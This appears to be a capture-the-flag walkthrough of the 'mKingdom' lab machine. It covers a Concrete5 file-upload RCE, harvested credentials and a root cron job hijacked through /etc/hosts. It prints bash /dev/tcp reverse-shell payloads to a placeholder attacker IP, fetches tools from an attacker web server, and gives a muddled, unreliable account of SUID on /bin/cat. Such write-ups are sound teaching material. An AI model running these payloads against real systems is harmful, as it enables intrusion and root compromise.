Skip to main content

mKingdom

I. Reconnaissance and Enumeration

export TARGET_IP=10.10.109.114
nmap -p- --min-rate 5000 $TARGET_IP

Results:

PORT   STATE SERVICE
85/tcp open  mit-ml-dev

Web Service Enumeration

  • Initial Access: Browsing to http://$TARGET_IP:85 reveals a seemingly empty page.

  • Directory Brute-Forcing

    feroxbuster -u http://$TARGET_IP:85 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200
    • Results: The scan reveals /app/, which redirects to /app/castle/.
    • Analysis: The redirect suggests a structured web application, possibly a Content Management System (CMS).

  • CMS Identification:

    • Method: Examining the HTML source code of http://$TARGET_IP:85/app/castle/ reveals: 
      <meta name="generator" content="concrete5 - 8.5.2"/>
    • Analysis: The meta tag clearly identifies the CMS as Concrete5 version 8.5.2.

II. Vulnerability Analysis

  • Vulnerability Research: A search for "Concrete5 8.5.2 exploit" reveals a known Remote Code Execution (RCE) vulnerability related to the File Manager. The vulnerability allows authenticated users to upload malicious files, leading to code execution.

III. Exploitation

This section details the steps taken to exploit the identified vulnerability.

  • Step 1: Gaining Initial Access (Authentication Bypass/Brute-Force):

    • Method: The login page is located at the bottom of the website via a "Log in" link.
    • Attempt 1 (Brute-Force): Attempting to brute-force the "admin" user (a common default) resulted in an IP ban. This highlights the importance of careful reconnaissance and avoiding noisy techniques when possible.
    • Attempt 2 (Default Credentials): Trying common credentials like admin:password successfully granted administrative access.

  • Step 2: Adding PHP as an Allowed File Type:

    • Navigation: Within the Concrete5 admin interface, navigate to "System & Settings" -> "Allowed File Types."
    • Action: Add "php" to the list of allowed file extensions.
    • Explanation: This step is necessary because Concrete5, by default, restricts the types of files that can be uploaded for security reasons. We're intentionally bypassing this protection.

  • Step 3: Uploading a PHP Reverse Shell:

    • Shell Generation: A PHP reverse shell can be generated using tools like msfvenom (part of the Metasploit Framework) or online generators like https://www.revshells.com/.
    • Example (Conceptual - adapt to your attacker IP and port):
    <?php
    exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_ATTACKER_IP/YOUR_PORT 0>&1'");
    ?>
    • Upload: Navigate to the "File Manager" ("Files" -> "Upload Files") and upload the generated PHP shell (e.g., shell.php).

  • Step 4: Triggering the Reverse Shell:

    • Listener Setup: On the attacker machine, start a Netcat listener: nc -lvnp YOUR_PORT
    • Execution: Access the uploaded shell through its URL provided by the CMS (e.g., http://$TARGET_IP:85/application/files/SOMEPATH/shell.php).
    • Result: A successful connection will appear on the Netcat listener, providing a shell as the www-data user.

  • Step 5: Shell Sanitization

    • Explanation: Terminal sanitization is a crucial step to improve the stability and usability of a reverse shell obtained on a target system. Raw reverse shells often lack features like command history, tab completion, and proper terminal handling, making interaction difficult.
    • Steps:
      1. Background the shell: script /dev/null -c bash then CTRL + Z
      2. Prepare the terminal: stty raw -echo; fg
        • stty raw: Sets the terminal to raw mode, allowing direct input/output.
        • -echo: Disables echoing of input characters (prevents double characters).
        • fg: Brings the shell back to the foreground.
      3. Reset the terminal: reset xterm or, reset then enter the terminal type that best applies, for this example it's xterm.
      4. Set environment variables:
        • export TERM=xterm: Sets the terminal type for proper display and features.
        • export SHELL=/bin/bash: Specifies the shell to use.
      5. Adjust terminal size:
        • stty size (on your attacker machine, in a normal terminal, to get your usual terminal dimensions).
        • stty rows <ROWS> columns <COLUMNS> (in the sanitized shell, replacing <ROWS> and <COLUMNS> with the values from stty size).

IV. Privilege Escalation (www-data to toad)

  • Database Enumeration: Since Concrete5 uses a database, we look for credentials.

    • Command: cat /var/www/html/app/castle/application/config/database.php
    • Result: This reveals database credentials: toad:toadisthebest. This highlights the importance of securing configuration files.

  • User Switching:

    • Command: su toad
    • Password: toadisthebest
    • Result: We successfully switch to the toad user.

V. Privilege Escalation (toad to mario)

  • Bashrc Enumeration

    • Command: cat /home/toad/.bashrc
    • Result: The .bashrc file contains: export PWD_token='aWthVGVOVEFOdEVTCg=='

  • Bashrc Exploitation

    • Command: echo "aWthVGVOVEFOdEVTCg==" | base64 -d
    • Result: The command decodes a base64 to find:ikaTeNTANtES

  • User Switching:

    • Command: su mario
    • Password: ikaTeNTANtES
    • Result: Successfully switched to the mario user.

  • Reading user.txt (SUID Binary):

    • Initial Attempt: cat /home/toad/user.txt results in "Permission denied."
    • SUID Check: ls -l /bin/cat shows that /bin/cat has the SUID bit set and is owned by toad. This means it executes with toad's privileges, not mario's.
    • Alternative Commands: Since we can't directly use /bin/cat, we use other commands that can read files without needing toad's privileges:
      • nano /home/toad/user.txt
      • head /home/toad/user.txt
      • less /home/toad/user.txt
      • tail /home/toad/user.txt
      • grep . /home/toad/user.txt
    • Explanation: The SUID (Set User ID) bit is a special permission that allows a file to be executed with the privileges of the file's owner, not the user running the command. In this case, /bin/cat has a SUID.

VI. Privilege Escalation (mario to root)

  • Process Monitoring (pspy):

    • Transfer pspy64: Use a web server on the attacker machine (python3 -m http.server 6666) to transfer pspy64 to the target machine (wget http://ATTACKER_IP:6666/pspy64).
    • Execution: chmod +x pspy64 && ./pspy64
    • Observation: pspy64 reveals a cron job running as root: 
      2025/02/08 06:38:01 CMD: UID=0     PID=2653   | curl mkingdom.thm:85/app/castle/application/counter.sh
      2025/02/08 06:38:01 CMD: UID=0     PID=2652   | /bin/sh -c curl mkingdom.thm:85/app/castle/application/counter.sh | bash >> /var/log/up.log
    • Analysis: Root periodically fetches and executes counter.sh from mkingdom.thm. This is a classic command injection vulnerability via a misconfigured cron job.

  • Exploiting the Cron Job (DNS Hijacking):

    • Understanding the Vulnerability: We can't modify counter.sh directly on the server. However, we can control the DNS resolution of mkingdom.thm using the /etc/hosts file.
    • Modifying /etc/hosts: Edit /etc/hosts on the target machine (nano /etc/hosts) and change the entry for mkingdom.thm to point to the attacker's IP address: 
      # Replace: 127.0.1.1 mkingdom.thm
      # With:    YOUR_ATTACKER_IP mkingdom.thm
    • Creating a Malicious counter.sh: On the attacker machine, create the same directory structure as seen in the cron job output and create a malicious counter.sh: 
      mkdir -p app/castle/application/
      echo '#!/bin/bash' > app/castle/application/counter.sh
      echo "sh -i >& /dev/tcp/YOUR_ATTACKER_IP/7777 0>&1" >> app/castle/application/counter.sh

      # Explanation of the payload:
      # sh -i: Starts an interactive shell.
      # >& /dev/tcp/YOUR_ATTACKER_IP/7777: Redirects both standard output (>) and standard error (&) to a TCP connection on your attacker's IP and port 7777.  This creates the reverse shell.
      # 0>&1: Redirects standard input (0) to the same location as standard output (1), ensuring the shell is interactive.
    • Setting up a Web Server: On the attacker machine, start a web server in the directory containing the app folder: python3 -m http.server 85
    • Setting up a Listener: On the attacker machine, start a Netcat listener: nc -lvnp 7777
    • Waiting for the Cron Job: When the cron job runs, it will download the malicious counter.sh from the attacker's web server and execute it, establishing a reverse shell as root.